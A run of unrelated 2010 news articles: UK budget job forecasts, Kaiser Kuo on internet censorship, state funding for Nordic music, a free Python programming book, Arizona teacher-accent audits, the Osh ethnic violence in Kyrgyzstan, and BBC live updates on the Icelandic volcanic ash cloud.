From next year , officials believe that stronger growth and a rising working population will lead to an acceleration in jobs growth .
Over the five - year period from 2010 to 2015 , the Treasury assumes that employment will rise from 28.8 m this year to 30.1 m in 2015 , despite the loss of jobs caused by spending cuts .
The TUC general secretary , Brendan Barber , said : " With Treasury figures revealing that spending cuts will hit private sector jobs harder than those in the public sector , it is absurd to think that the private sector will create 2.5 m new jobs over the next five years . "
" This is not so much wishful thinking as a complete refusal to engage with reality .
Much more likely are dole queues comparable to the 1980s , a new deep north - south divide and widespread poverty as the budget 's benefit cuts start to bite .
Many will find that a frightening prospect .
" John Philpott , chief economist at the Chartered Institute for Personnel and Development , said : " There is not a hope in hell 's chance of this happening [ the creation of 2.5 m new jobs ] .
There would have to be extraordinarily strong private sector employment growth in a … much less conducive economic environment than it was during the boom . "
The CIPD has estimated that there will be 725,000 jobs lost in the public sector alone by 2015 , although Philpott said the number could be lower if the government succeeded in pushing through pay cuts .
He added that Osborne was expecting a similar rise in employment over the next five years to that seen during 13 years of the last Labour government , when around a third of the employment growth came from the public sector .
" This is a slower growth environment and there will be no contribution from the public sector . "
Last night David Miliband , one of the candidates for the Labour leadership , said : " This proves what we feared but the government kept secret .
The budget will slash jobs not create them , and the least well - off will pay the highest price . "
Andy Burnham , another of the Labour leadership candidates , said : " The human cost of Osborne 's budget is now clear , despite his best efforts to hide it . "
Beijing - based academic Kaiser Kuo will bravely step into a local political storm in a series of televised debates this week as one of the few voices arguing that some forms of internet censorship can be justified .
His billing on Q&A tonight , at the Intelligence Squared debate at Sydney 's City Recital Hall tomorrow night and the Wheeler Centre in Melbourne on Thursday presents an opportunity to understand internet censorship from a very different world - view to our own .
Speaking to iTnews from his Sydney hotel room today , Kuo joked that he was asked to come to Australia because the St James Ethics Centre - which runs the Sydney event - " struggled to locate anyone willing to back such an unpopular position " - that censorship can be justified .
But those expecting Kuo to argue censorship is routinely justified will be disappointed .
Kuo , a consultant for Chinese video site Youku.com and a political science graduate from Berkeley , would feel more comfortable on the other side of the debate .
" In most cases , I am opposed to internet censorship , " he said .
" It is rarely used judiciously .
" I just need to help people understand that this is n't a black and white issue , there are many shades of grey . "
Kuo argues that his home country of China has a " draconian sense of censorship .
" I have severe objections to the way it 's done in China , " he said .
" It is entirely un- transparent and arbitrary .
It is done using blunt instruments , and there are unintended casualties when they swing those blunt instruments about .
" But even in China , occasionally there are instances where lives are actually saved by internet censorship .
It 's rare , but it happens . "
Life - saving censorship ?
Kuo takes us back to July 5th , 2009 , when the Chinese Government locked down the whole of the Xinjiang province in response to ethnic violence in its capital , Urimqi .
In this case , a larger number of Han Chinese - the nation 's predominate ethnicity - were killed in clashes with a minority group , the Uighurs .
" The security bureaucracy agreed very quickly to enact an internet blackout , " Kuo said .
" There were genuine fears of recriminations against the Muslim Uighur minority throughout China .
Han Chinese in bigger cities were ready to incite violence against this minority .
" As heavy handed as their reasons were , the impetus for the bureaucracy to censor the internet was not unreasonable . "
Kuo also uses an example from India - where the popular Google Orkut social networking tool is monitored and censored by Google against any criticisms of the Hindu Nationalist Party Shiv Sena , purely because of the violence such discussions have led to historically .
" It 's a real problem for Google , " Kuo says .
" They believe in the right to free speech , but they also do n't like people rioting and burning cars . "
Read on for Page Two -
The reality of Chinese internet censorship
The first time the Knife got money from the Swedish Arts Council was in 2001 , for their self - titled debut album .
The electro - pop duo received 45,000 Swedish kronor ( SEK ) , or about $ 6,327 -- " pretty standard for albums back then , " says lead singer Karin Dreijer Andersson .
Statens Kulturråd , as the arts council is known , awarded funding for the Knife in 2006 , too .
That time , Andersson ( who also records as Fever Ray ) and brother Olof Dreijer received 80,000 SEK , or $ 11,248 , through label Rabid as tour support for their first -- and , so far , only -- U.S. shows .
" We have a long history of social democratic culture in Sweden , which I think has made this possible , " Andersson explains .
Swedish taxpayers ' investment in the Knife led to quick results .
The New York Times ' Jon Pareles described one 2006 show at New York 's Webster Hall as " an elaborately synthetic production that flaunted technology but conjured emotion . "
That same year , the Knife 's Silent Shout was frequently mentioned in critics ' year - end lists ( including finishing # 1 in our own list ) .
Sweden 's political culture , however , is shifting .
In the September 2006 general election , a center - right coalition toppled the long - dominant Swedish Social Democratic Party .
" Everything is getting more up to the individual , " Andersson says .
" Taxes get lower and poor people get even less money .
We have an election inSeptember , and I hope there will be an end to this . "
Scandinavian social democracies have come under the microscope amid the U.S. debate over President Barack Obama 's domestic agenda .
In February 2009 , FOX News host Bill O'Reilly asked , " Do we really want to change America into Sweden ? " Last December , at a Tea Party protest in Washington , D.C. , a handmade sign went further : " Norwegian socialists like what they see in Obama .
WE DO NOT . "
As American musicians wait to see whether Obama 's landmark health - care legislation -- finally signed last week after a year of heated debate and concessions -- will do anything to relieve their worries about surging medical costs , countries such as Sweden , Norway , and Canada make it easier for bands to focus on the creative arts by providing not only universal health care , but often cold hard cash , too .
Every year , millions in public money goes toward recording , artist promotion , videos , venues , touring , festivals -- even showcases at South By Southwest or CMJ Music Marathon .
" Things that are not possible are made possible , " notes Ólöf Arnalds , an Icelandic singer / multi- instrumentalist who has benefited from government support .
Over the past decade , Sweden has , perhaps not coincidentally , become a major player in global indie music .
So , too , has Canada , which also enjoys government support for pop music .
It 's enough to make your average econo - jamming U.S. touring band drool with envy .
But taxpayer funding for music is n't right for everybody .
In some countries , public funding is a way to promote national culture in the face of American music 's commercial dominance ; in places like Sweden and the UK , it 's also a means of protecting a prized national export .
Nearly everywhere , more funding goes to classical forms like opera or ballet than to what is loosely called " rhythmic music . "
When bands do get money , there are always debates over which ones really deserve the support .
Of course , this is all possible only because taxpayers are willing to fork over what , to Americans , would be exorbitant sums : Total tax revenue in Sweden , Norway , and Denmark runs as high as nearly 50 % of GDP , compared with the UK 38 % , Canadian 33 % , and U.S. 28 % , according to the Organisation for Economic Co-operation and Development .
And , just as U.S. health - care legislation has constantly hovered over the brink , public arts spending programs in these nations are always at risk of being slashed .
Norway , as it happens , is one of the most active government sponsors of music .
The Norwegian Arts Council has budgeted 126.3 million Norwegian kroner ( NOK ) , or $ 21.4 million , for music in 2010 .
Similarly , the Fund for Lyd Og Bilde ( fund for audio and video ) raised its budget for 2010 to 28.7 million NOK ( $ 4.9 million ) , up 5.5 % from 27.2 million NOK ( $ 4.6 million ) in 2009 .
Each organization has provided money for touring and recording to the likes of should - be pop star Annie , singer - songwriter Sondre Lerche , and artists on such respected Norwegian labels as Rune Grammofon , as well as everything from children 's hip - hop to jazz to extreme metal .
" A lot of this money is well spent in smaller European countries , where you have to have some help at times to try to be exported to the rest of Europe , " says Jonas Prangerød , spokesman for Øya Festival , which receives a multi - year grant from the arts council .
Public funding helped Joakim Haugland shape the Smalltown Supersound label he started at age 15 into an Oslo - based juggernaut that has released music by Annie , Lindstrøm , Bjørn Torske , the Whitest Boy Alive , and Jaga Jazzist , plus Americans Sunburned Hand of Man and Sonic Youth .
He credits the Norwegian fund for audio and video with giving a big boost to the operation .
" I took the whole route with cassettes and then 7 "s and some LPs and some CDs , but it took quite a while before I got support from this fund , " Haugland says .
" The first band that I got it for was a band with my brother in it , and the reason I got the money is because I 'm from the south of Norway -- a really small town .
That was district politics ; they want to stimulate districts outside of the big cities .
It was not much money , but it allowed me to make my first proper CD , which earned a little money so I could put out the next one . "
The early foundation of the fund was a tax on blank cassette tapes in the 1980s , Haugland says .
In Norway and other countries with taxpayer grants for music , a committee of people from the industry generally decides who will get the awards .
Haugland , like the Knife 's Andersson , views the funding of music and culture in Norway as closely related to the whole idea of Scandinavian social democracy -- " you know , the state involved in a good way , " he says .
" From the outside , there seem to be some people in America afraid of the state .
But we 're not .
Because Norway is divided :
There 's the state , and there 's private ownership of stuff .
I think there 's a perfect mix .
It 's not communism , but it 's not the U.S.
We 're somewhere in between . "
Sweden has its own assortment of groups that sponsor the arts and culture .
When it comes to music , the Swedish Arts Council is the body that awards money to music ensembles , orchestras , and other groups , while the Swedish Arts Grants Committee makes awards to individual artists .
The Swedish Arts Council grants about 11.5 million SEK ( $ 1.65 million ) each year to about 145 music groups out of 250 that apply , plus about 24 million SEK ( $ 3.3 million ) to venues , 222 million SEK ( $ 30.9 million ) to regional music organizations , and 64 million SEK ( $ 8.9 million ) to Concerts Sweden , says Hasse Lindgren , an administrative officer specializing in music ; Concerts Sweden , however , is in its final year .
The Swedish Arts Grants Committee allocates about 19 million SEK ( $ 2.7 million ) to musicians annually .
There 's also Export Music Sweden , which organized two all - Swedish SXSW showcases with the Swedish Chamber of Commerce in Austin , Texas .
In Sweden , labels apply for recording funding twice a year , and that money pays for only part of the recording , not the full budget , says Martina Ledinsky of Stockholm - based Razzia Records , which has used grant money toward releases by Hello Saferide , Firefox AK , Dundertåget , and Joel Alme .
" When I received the recording funding for my second album , Waiting for the Bells , from Kulturr ådet it enabled me to use a real strings orchestra and I could spend more time in a very good studio with a good producer , Mattias Glavå , " Alme says .
Nevertheless , not all labels expect to receive support -- including Alme 's former patrons , Sincerely Yours ( home to the Tough Alliance and jj ) .
None of its artists have gotten government funding , the label says , and Lindgren confirms .
" There 's one which you apply for but we 'd never get that , " a Sincerely Yours representative says , in the label 's usual cryptic , anonymous way .
" We 're too much in our own little world I guess . "
Could the best health - care policy be a strong arts and culture policy ?
Lindgren invokes the possibility .
" There is a big debate in Sweden , Norway , and Denmark , " he says .
" In which way do cultural experiences help you in health ?
So for instance , there 's a project here in Sweden where doctors actually can prescribe going to the opera to help you get well .
For sure , music and art can help people . "
Denmark , too , has its Danish Ministry of Culture , Danish Arts Foundation , Danish Arts Council , Danish Arts Agency , and Musix Export Denmark .
The Danish Music
Act of 1971 established the " arms - length principle , " where politicians decide upon a framework but do not get involved in what is supported .
Roskilde Festival and other music festivals , however , receive no support from the state , though by donating all profits to charity , Roskilde is excluded from certain taxes .
" It is evident that the emphasis on supporting rhythmic music since 2000 has really borne fruit , " Roskilde spokeswoman Christina Bilde observes .
But she says there 's still a desire for such music to be " recognized on equal terms with other kinds of music and other cultural expressions , " financially and otherwise .
NEXT :>
Arts funding in Canada and the UK
Al Sweigart sez ,
I 've written a book that teaches programming to kids ( and beginner adults ) that I thought might interest you .
The book is Invent Your Own Computer Games with Python and it is available in full for free under a Creative Commons license .
I began writing it when a friend who nannies a 10 year old boy asked me for any good programming tutorials .
Most of what I found seemed to be either boring textbooks or books for software engineers .
My book uses a different approach : Each chapter focuses on the source code for a small game ( Tic Tac Toe , Hangman , Othello , an encryption program , etc. ) and explains the concepts as they come up in the program .
While sometimes concepts are introduced in an unorthodox order , they are always based on actual programs .
The first three chapters covers the basics of installing Python and using the interactive shell .
The next several chapters covers games that use text and ASCII art .
The last four chapters introduces the Pygame library for graphics and sound .
The print edition came out a couple months ago and has about a dozen reviews on Amazon .
( I 've priced it at $ 25 to qualify for free shipping and but still cheaper than other computer books , and it 's still free online . )
Arizona has been under fire for a controversial anti-illegal immigrant law and now its Department of Education is embarking on a course of action that many critics also believe is being enforced in a discriminatory fashion .
“ The Arizona Department of Education recently began telling school districts that teachers whose spoken English it deems to be heavily accented or ungrammatical must be removed from classes for students still learning English , ” The Wall Street Journal reported .
ADVERTISEMENT
“ This is just one more indication of the incredible anti-immigrant sentiment in the state , ” said Bruce Merrill , a professor emeritus at Arizona State University who conducts public - opinion research . ….
Nearly half the teachers at Creighton , a K - 8 school in a Hispanic neighborhood of Phoenix , are native Spanish speakers .
State auditors have reported to the district that some teachers pronounce words such as violet as “ biolet , ” think as “ tink ” and swallow the ending sounds of words , as they sometimes do in Spanish .
These teachers “ are very good educators who understand the culture ” of their students , ” said Ms. Agneessens , Creighton ’s principal .
“ Teachers should speak grammatically correct English , ” she acknowledged , but added , “ I object to the nuance of punishment for accent . ”
“ It does n’t matter to me what the accent is ; what matters is if my children are learning , ” said Luis Tavarez , the parent of sixth - and eighth - graders at Creighton .
Christina Parsons was born in Brazile and has taught the English Language Learners class in Tucson for more than 20 years , but she told CNN that she has been subjected to an audit based on her ability to pronounce English words .
“ They just walked in in the middle of class , ” she told CNN ’s Thelma Gutierrez .
State School Superintendent Tom Horne denies the crackdown is based on teachers ’ accents .
“ We are not going after any accents including Spanish accents .
It has to be faulty English .
If students are being taught English and they ’re going to refer to a comma as a ‘ coma ’ people are going to misunderstand them , ” said Horne .
But studies have shown that non-native teachers actually make better educators , according to University of Arizona professor Roseann Gonzales .
She says that the ability to pronounce the language is not the most important aspect to learning .
ADVERTISEMENT
“ Language is very contextual .
We depend on the context to understand what words mean , ” Gonzales told CNN .
Parsons is still waiting on the results of her audit .
“ The Arizona Department of Educations gives us a certificate saying , ‘ Yes , you are certified to teach . ’
After that they say , ‘ No , I do n’t think you can do it so I ’m going to go into the classroom and see if you are doing a good job . ' ”
CNN anchor Kyra Phillips disagrees with the new policy .
“ Would a guy like the Governor of California be allowed to teach kids how to learn English ?
Arnold ’s Austrian accent is as thick as his biceps but his English seems to be just fine , ” remarked Phillips .
ADVERTISEMENT
“ I was also going to give a graduation speech in Arizona this weekend .
But with my accent , I was afraid they would try to deport me , ” CBS News reported the Republican governor joked in his speech at Emory University .
“ Their accents reflect who they are and where they came from .
What ’s more important ?
What teachers say or how they say it ? ” Phillips wondered .
ADVERTISEMENT
This video is from CNN ’s Newsroom , broadcast May 24 , 2010 .
Ready to fight back ?
Sign up for Take Action Now and get three actions in your inbox every week .
You will receive occasional promotional offers for programs that support The Nation ’s journalism .
You can read our Privacy Policy here .
Sign up for Take Action Now and get three actions in your inbox every week .
Thank you for signing up .
For more from The Nation , check out our latest issue
Subscribe now for as little as $ 2 a month !
Support Progressive Journalism
The Nation is reader supported : Chip in $ 10 or more to help us continue to write about the issues that matter .
The Nation is reader supported : Chip in $ 10 or more to help us continue to write about the issues that matter .
Fight Back !
Sign up for Take Action Now and we ’ll send you three meaningful actions you can take each week .
You will receive occasional promotional offers for programs that support The Nation ’s journalism .
You can read our Privacy Policy here .
Sign up for Take Action Now and we ’ll send you three meaningful actions you can take each week .
Thank you for signing up .
For more from The Nation , check out our latest issue
Travel With The Nation
Be the first to hear about Nation Travels destinations , and explore the world with kindred spirits .
Be the first to hear about Nation Travels destinations , and explore the world with kindred spirits .
Sign up for our Wine Club today .
Did you know you can support The Nation by drinking wine ?
Osh , Kyrgyzstan
Residents are hesitantly dismantling barricades and emerging from behind burned cars and felled trees , but the streets in central Osh remain painted with large white letters looking skyward : S - O - S .
As violence engulfed the city June 11 – 14 , ethnic Uzbeks scrawled the pleas hoping that some of the helicopters circling overhead might come to their aid , that the government might stop the pogroms .
In their mahallas , or separate neighborhoods , small groups of Uzbek men mingle and reminisce , sharing news of family members taking shelter across the border in Uzbekistan and guarding what ’s left of their homes .
They worry that some Kyrgyz will return to finish the job .
Ad Policy
On Internatsionalnaya Street , named after the Moscow - sponsored 1920s movement that pledged to bring the fruits of Communism to workers of any ethnicity in every country , Uktam Turdibayev pulls charred pieces of his neighbors ’ bones from the smoking debris that was their house .
He ’s already retrieved a whole family – five children and two adults – dead , from the cinders .
They were all Uzbeks , a minority in this post - Soviet state .
Led by armored military vehicles , Turdibayev says , several hundred young Kyrgyz men , some with Kalashnikovs , ransacked his neighborhood , methodically shooting , then looting , then setting the houses alight .
I heard the same story a dozen times .
“ The helicopters saw but did n’t help .
The government does n’t help .
No one helps , ” he said .
Turdibayev stayed in the mahalla while his wife and children fled to a village outside of Osh .
“ If we had weapons , we would have defended ourselves , but we have no weapons .
They ’ll pay . ”
Perhaps 2,000 died in the violence , according to interim President Roza Otunbayeva .
Most were Uzbeks , but Kyrgyz died as well .
Now there is no clear way forward for reconciliation .
It appears the combatants were ordinary young men , reportedly aided on one side by a few Kyrgyz soldiers passing out weapons , or even jumping into the action .
Unaddressed stereotypes have allowed tensions between Kyrgyz and Uzbeks to fester ever since the only previously reported conflict between the two groups , in 1990 .
These typecasts were a breeding ground for the surge of rumors — spread by Internet chat rooms , text messages and word of mouth — that helped provoke the attacks : “ Uzbek men raped a group of Kyrgyz girls ” ; “ young men brawled over a restaurant bill ” ; “ Uzbeks , in their efforts to declare autonomy , had armed themselves . ”
But frictions between the two groups are n’t the result of some ancient ethnic hatred .
They have waxed and waned for only a generation , as local elites , manipulating economic grievances , vie for control of resources .
In recent times , that has meant Afghan heroin .
In place of a functioning state , southern Kyrgyzstan has become a network of trafficking routes controlled by narco - barons and their extended families .
Although Otunbayeva ’s interim government attributes the latest violence to the former president , Kurmanbek Bakiyev , who was ousted in a bloody revolt on April 7 , and a handful of other bad guys such as Islamic terrorists or a mysterious regional “ third force ” seeking to weaken Kyrgyzstan , the most likely explanation is a mafia power struggle gone horribly wrong .
A third of Afghan narcotics pass through Central Asia en route to Russia , and a majority of those through Osh .
As weapons and drugs tend to travel along the same routes , lack of government oversight since Bakiyev ’s overthrow has prompted widespread fears that the country has become overrun with guns .
Local criminal bosses have used the instability to solidify their networks and increase control , effectively blackmailing the new government to preserve their Bakiyev - era concessions .
“ We knew there were guns arriving [ after Bakiyev ’s ouster ] .
Osh is full of drug dealers , and we knew they had guns , ” one frightened Kyrgyz NGO leader in Osh told me , asking not to be named for fear of retribution .
“ The Uzbeks controlled the drugs , the Kyrgyz controlled the politics .
After Bakiyev was gone , it seemed the Kyrgyz mafia wanted the drugs and the Uzbeks wanted to be involved in politics . ”
The country ’s largest minority , Uzbeks make up almost a fifth of the population ; the proportion is much higher in the south .
Yet the region has few ethnic Uzbek officials ; street signs are either in Kyrgyz or Russian , the country ’s other official language , but rarely in Uzbek .
The security forces are largely Kyrgyz , a policy inherited from the Soviet Union .
Soviet leader Joseph Stalin carved up Central Asia in the 1920s , arbitrarily dividing the choicest morsel of Central Asian farmland , the lush Ferghana Valley , among three Soviet republics : the Kyrgyz Soviet Socialist Republic , the Tajik SSR and the Uzbek SSR .
The borders did n’t mean much , because all fell within the giant Soviet empire .
Each was led by the so - called titular nationality , yet Moscow operated a conflicting policy of ethnic harmonization :
While mixing groups that had lived separately , and offering upward mobility for the national elites , the Soviets highlighted the differences between them – for example , by labeling ethnicity on state - issued identification documents – thus ensuring that the multiethnic empire remained divided and beholden to the center .
In the late 1980s Soviet leader Mikhail Gorbachev ’s policies of perestroika , or restructuring , led to national elites grabbing what they could , provoking ethnic tensions throughout the USSR .
Plans to distribute more land to the Kyrgyz ran out of space .
Kyrgyz , who had traditionally lived in the mountains and worked as shepherds , clashed with Uzbeks , who had populated the cities of the Ferghana basin such as Osh .
In 1990 some ethnic Kyrgyz demanded that land belonging to an Uzbek - run collective farm be distributed to Kyrgyz farmers – this was the Kyrgyz Soviet Socialist Republic , after all .
In the violence that ensued , hundreds of Kyrgyz and Uzbeks died before Soviet troops restored order .
The newly independent state of Kyrgyzstan , born in 1991 , mostly ignored those events , instead fabricating creation myths for the Kyrgyz people and failing to address the us-versus - them stereotypes that grew out of the conflict .
“ There was no proper investigation of the 1990 events , no discussion — no one wanted to talk about it , ” said Nazira Satyvaldiyeva , an expert in conflict resolution and director of the Eurasia Foundation ’s
Osh field office .
“ Both Kyrgyz and Uzbeks are responsible for the current crisis . ”
Animosities persisted , but most Uzbeks and Kyrgyz continued living in mixed villages or adjoining neighborhoods .
Yet as established farmers and traders , Uzbeks have traditionally been wealthier .
Kyrgyzstan ’s economy has been stagnant for a generation , fostering nationalist jealousies .
“ Ninety percent of cafes , restaurants , shops and large trading centers belong to Uzbeks .
They should have been happy with what they had , but they wanted more .
They started to demand political rights , ” said Dr. Shairbek Sulaymanov , director of the Osh Regional Hospital , on his tenth straight day working round - the - clock and sleeping in his office .
“ We need to make the policy stricter toward them .
Uzbeks have become more assertive in promoting their rights .
This is not correct .
This must be changed . ”
When Bakiyev was overthrown in April , minorities became worried about their place in the new order .
“ During the April 7 violence , we asked ourselves who were these wild people , these Kyrgyz [ fighting in the streets of Bishkek ] .
It made the minorities insecure .
‘ If the government cannot protect us from these wild people , what should we do ? ’ ” Satyvaldiyeva , a Kyrgyz , said , summarizing the fears of her Uzbek friends .
A turning point came in mid-May .
When supporters of the ousted Bakiyev booted the interim governor from office in Bakiyev ’s hometown of Jalal - Abad , the next day Uzbeks , led by a wealthy local businessman and politician , Kadyrjan Batyrov , fought back — with firearms .
Several died , but the interim government returned to power .
A few days later Batyrov — whom locals suspect is involved in drug trafficking — spoke on television and demanded better rights for Uzbeks .
Many Kyrgyz living in the south , seeing Uzbeks enter politics with such violence , became scared .
Lacking a government to address Kyrgyz concerns that they could lose power in the region , nationalist feelings spun out of control , Satyvaldiyeva said .
Kyrgyzstan is bracing for more violence as the country prepares a referendum to legitimize the fractured group of opposition leaders that came to power during the April uprising .
The vast population displacement in the south — perhaps the worst refugee crisis the former Soviet Union has seen in twenty years — along with daily rumors of spreading violence , threaten to derail the vote , scheduled for June 27 .
International donors are pushing for the government to move ahead with the vote , saying Bishkek will gain legitimacy by holding it , but with hundreds of thousands displaced , and even more afraid to leave their homes , it ’s unlikely that enough southerners will turn out to validate the poll .
The international community has offered little tangible political or security support .
During the fighting , Kyrgyz interim leaders begged for Russian military help under the Moscow - led Collective Security Treaty Organization ( CSTO ) .
Moscow refused , likely afraid of regional reactions , revealing itself to be a weak friend .
The Americans , watching from their airbase outside of Bishkek — a vital way station for the war in Afghanistan — offered humanitarian aid , but were too afraid to offer peacekeepers .
Meanwhile , many Uzbeks are too terrified to go home .
At least 400,000 have been displaced , the UN says .
Kyrgyz troops are patrolling the streets , adding to their fear , but Bishkek does not control the south .
Many now dread a partisan war .
Both Kyrgyz and Uzbeks claim atrocities occurred .
And reconciliation is unlikely when men such as Osh Mayor Melisbek Myrzakmatov insist the state – meaning him – does n’t need help understanding what happened .
Myrzakmatov is a Bakiyev - appointee who is popular with Kyrgyz and blamed by many Uzbeks for inciting the bloodshed .
The interim government appears unable to remove him .
“ When they come back , we ’ll tell them they should not be afraid , ” said the mayor , marching around his office with a handgun on his hip and dismissing Uzbek fears of men such as his plainclothes Kyrgyz militia milling about the corridor .
Myrzakmatov accused the usual , invisible boogeyman – Islamic radicals – for the violence , but when pressed , admitted it was merely a cry of “ Allahu Akbar ” – god is great – that fostered his conclusion .
On my way out of his office , a Kyrgyz police officer yelled at an elderly Uzbek lady , telling her to leave .
“ All I want is for them to be polite , ” she complained .
As she descended the cracked concrete stairs , she entered a crowd of Kyrgyz women shouting that Uzbeks do n’t belong in the government building .
The volcanic cloud seen at its source
2105 The BBC is discontinuing this live update page .
For the latest developments , please go to our main news page 2050 UK's air traffic control service , Nats advises that restrictions preventing flights in England and Wales will remain in place until at least 1300 BST on Saturday .
2019 British Airways extends its no-fly policy , cancelling all flights in and out of London throughout Saturday .
2001 Some flights are resuming in Northern Ireland as skies there begin to clear but service is limited , officials say .
1945 Oli in Sevenoaks says :
It 's turned very hazy in the last half an hour here and there 's not a cloud in the sky anymore .
Has it just dumped the ash on us ?
1930 Sweden closes most of its airspace down again , after weather reports show the ash cloud is now likely to spread over the region Saturday and Sunday , Swedish aviation authorities say .
Only a few airports in the northernmost part of the country remain open .
1857 BBC environment correspondent David Shukman :
Icelandic volcanoes tend to erupt for long periods , says our correspondent .
How long the current one will continue is difficult to say , but it could continue for days , even months .
When the volcano at the Eyjafjallajoekull glacier erupted two centuries ago , it went on for eighteen months , he adds .
1827 London taxi firm Addison
Lee says it has received requests for cab journeys as far away as Paris , Zurich , Milan and Salzburg in Austria .
1801 AhmNoHere tweets : According to the Easyjet website , there is still a flight to London Luton from Geneva TONIGHT .
Read AhmNoHere 's tweets 1752 Two Icelandair flights touched down just after 1700BST at Glasgow Airport , and a third was expected later , transporting a total of about 600 passengers to the UK , the airline said .
1745 Mick in Folkestone says : I just went out in the garden and you can smell sulphur in the air .
1731 Dermot Blastland , managing director of Thomson and First Choice Holidays , said : " We 've decided to coach back all our ski customers over the weekend to free up flights , so that if the airspace becomes free then we 've got more aircraft to bring everybody back .
And we 've also got 14 aircraft sitting overseas waiting to bring our customers back . "
1725 Ryanair announces the cancellation of all scheduled flights to and from the UK , Republic of Ireland , Denmark , Finland , Norway , Sweden , Belgium , Holland , northern France , northern Germany , Poland and the Baltic states until 1300BST on Monday .
Chief executive Michael O'Leary called the impact of the volcanic ash cloud " an unprecedented event in Ryanair 's 26 - year history " , adding : " We can not take any safety risks with our aircraft , passengers or people in the British Isles , Scandinavia or the northern Europe coastline , as long as current meteorological forecasts suggest that the prevailing winds will continue to spread this volcanic ash across the airspace of these countries " .
1722 British Airways says it will be operating " a number of flights " from the US into Scotland overnight .
All its flights to and from London airports were cancelled until at least 1000BST on Saturday , the airline added .
1709 The World Health Organization ( WHO ) has said that ash particles that fall to ground level could cause respiratory problems , especially for those suffering from asthma and respiratory diseases .
WHO advised people to stay indoors if ash was falling .
In the UK , the Health Protection Agency and Scottish advisers stress the small amounts of ash are unlikely to cause any serious harm .
But if people notice symptoms such as a runny nose , itchy eyes or cough they may want to go inside , they advised .
Anyone with respiratory conditions such as chronic bronchitis , emphysema and asthma should ensure they have any inhalers or other medications with them , the recommendations add .
1659 Garry , in Oldham , says :
My car has had a light dusting of brownish gray soot on it since 2100 last night .
Washed it this morning but just noticed the soot is settling back on the car , not washing it again .
1658 Jessica , in Greensboro , US , says :
My best friend was set to fly to London yesterday to meet up with her fiance .
He 's just back from Iraq and she has n't seen him for months .
Due to her work schedule , this was the one and only opportunity to see him for another 2 - 3 months .
Her tears are absolutely heartbreaking .
1655 The Ministry of Defence says 550 military personnel due to be flown back to the UK are grounded in Cyprus .
1651 World airlines are losing at least $ 200 m ( £ 130 m ) in revenue a day because of flight disruptions , estimates the International Air Transport Association .
1646 Iceland 's volcanic eruption , if it sets off the nearby , much larger Katla volcano , could continue for more than a year , prompting long - term flights chaos , warn Norwegian and Icelandic vulcanologists ( quoted in Danish media reports ) .
1641 Nats to make further announcement at 2030BST about plans for UK airspace on Saturday .
1635 British Airways says it will look at the possibility of flying transatlantic services from Scotland after the opening up of some airspace there at 1900BST .
BA normally only runs domestic services from Glasgow , Edinburgh and Aberdeen .
1632 BBC Scotland correspondent Colin Blane , at Glasgow Airport :
There 's a sense of optimism as some restrictions on Scottish airspace have lifted , says our correspondent , with a flight having just left for Iceland from Glasgow .
1630 Alex Bristol , of UK air traffic control service Nats , said the parts of UK airspace being opened at 1900BST form a " more or less triangle , if you like , up to the west of Scotland , including the west Scottish airports , Shetlands , Orkneys , and Northern Ireland " .
But he added that flights clearly could not " go east or south from there because that flies straight into the ash cloud " .
" So we 're basically looking at those between each other , or potentially to the west , so transatlantic flights are possible into those airports . "
1617 Brian Flynn , of pan-European air traffic controllers Eurocontrol , said : " When you observe the size of the volcanic ash cloud , you can well imagine that it is very difficult for any significant movement of air traffic in the northern part of Europe to take place .
The disruption is major and unprecedented in Europe [ but ] unavoidable given the nature of the current problem
Brian Flynn
Eurocontrol
" The primary job of Eurocontrol and the airlines is to ensure the safety of the passengers .
Whereas the disruption is major and unprecedented in Europe , it is unavoidable given the nature of the current problem .
" This volcanic cloud is expected to move further south and eastward through the night .
" Given the fact that this volcanic ash cloud has been quite stable and moving very slowly since it started 48 hours ago , it is reasonable to assume that there will be significant disruption of European air traffic tomorrow . "
1614 eddieishere tweets :
Do we even need air travel ?
It 's sort of pleasant not having planes litter the sky .
Read eddieishere 's tweets 1610 In contrast to much of mainland Europe , Iceland 's airspace remains open .
It 's business as usual in terms of flights going in and out of Reykjavik , says the BBC's Ann Courtney from the Icelandic capital .
Flights are departing for the US , Glasgow and Dublin .
Some flights have been cancelled as a result of the airspace closures elsewhere in Europe though , she adds .
1601 Vicky Whatmough told BBC Radio 2 : My parents are refusing to remove their suitcases from the bedrooms and they 're staging a sit-in
Vicky Whatmough
" My parents were supposed to fly back from Delhi to Manchester yesterday , obviously could n't get through - they were put up in a five - star hotel by Emirates so everyone was very happy , except that a representative from Emirates arrived at the hotel this morning to inform them that Emirates had now discharged their 24 - hour duty of care to them and they were to vacate the hotel .
" They 've decided this is n't good enough , so they are refusing to remove their suitcases from the bedrooms and they 're staging a sit-in . "
1555 Romania will close the north - western part of its airspace from 0300 local time on Saturday ( 0100 GMT ) , officials say .
1550 Professor Malcolm Green , from the British Lung Foundation , said : " In light of the latest news that ash from the volcanic eruption in Iceland has started to reach ground level in the UK , we would advise people living with a lung condition in affected areas to carry their medication as a precaution as they may experience a short - term worsening of symptoms . "
The British Lung Foundation helpline can be called on 08458 50 50 20 .
1538 Belgian airspace will remain closed until 1000 local time Saturday ( 0900 BST ) , Belgian media reports .
1527 The BBC's Daniel Boettcher at London 's St Pancras railway station says Eurostar will lay on three additional departures to Paris for Saturday , adding 8,000 extra seats .
1522 Helen in York says : I think Nats are making totally the right decision .
It is causing a lot of people anguish and sleepless nights in airports abroad , but I 'm sure they understand it 's for their safety .
I do think the health service need to be clearer on their warnings for us at ground level as I have read conflicting information , one saying it is n't dangerous but another saying it is .
1519 A Belfast taxi driver was asked on Thursday by a group of businessmen to drive them to London 's Heathrow airport .
The 400 - mile trip cost the businessmen £ 650 but they left him a £ 50 tip .
1513 BaseOneGiff tweets :
At least , amidst all the chaos , we can safely say that the ashes have come home .
Read BaseOneGiff 's tweets 1508 The Norfolkline ferry service between Dover and Dunkirk said it is allowing walk - on passengers who will be accommodated on Eurolines coaches for the Channel crossing .
The firm still has capacity for car passengers and a limited number of foot passengers today on its 1600 and 1800 sailings to Dunkirk , and on the 2000 and 2200 crossings from Dunkirk to Dover .
1500 Hungary is planning to close its airspace for 24 hours from 1700 GMT , the country 's national transport authority says .
The closure could be extended or shortened , depending on advice from the national meteorological service , the agency adds .
1459 Paul Denton in Texas , USA says : I live on the flight path to Dallas / Fort Worth airport .
Instead of a flight every minute , I see one every 15 or 20 minutes .
So the impact is even felt here in Texas .
1457 There is still ash being thrown into the sky from the erupting Icelandic volcano , says Joe Sultana from Eurocontrol .
It is likely to move across Europe in a south - easterly direction he adds .
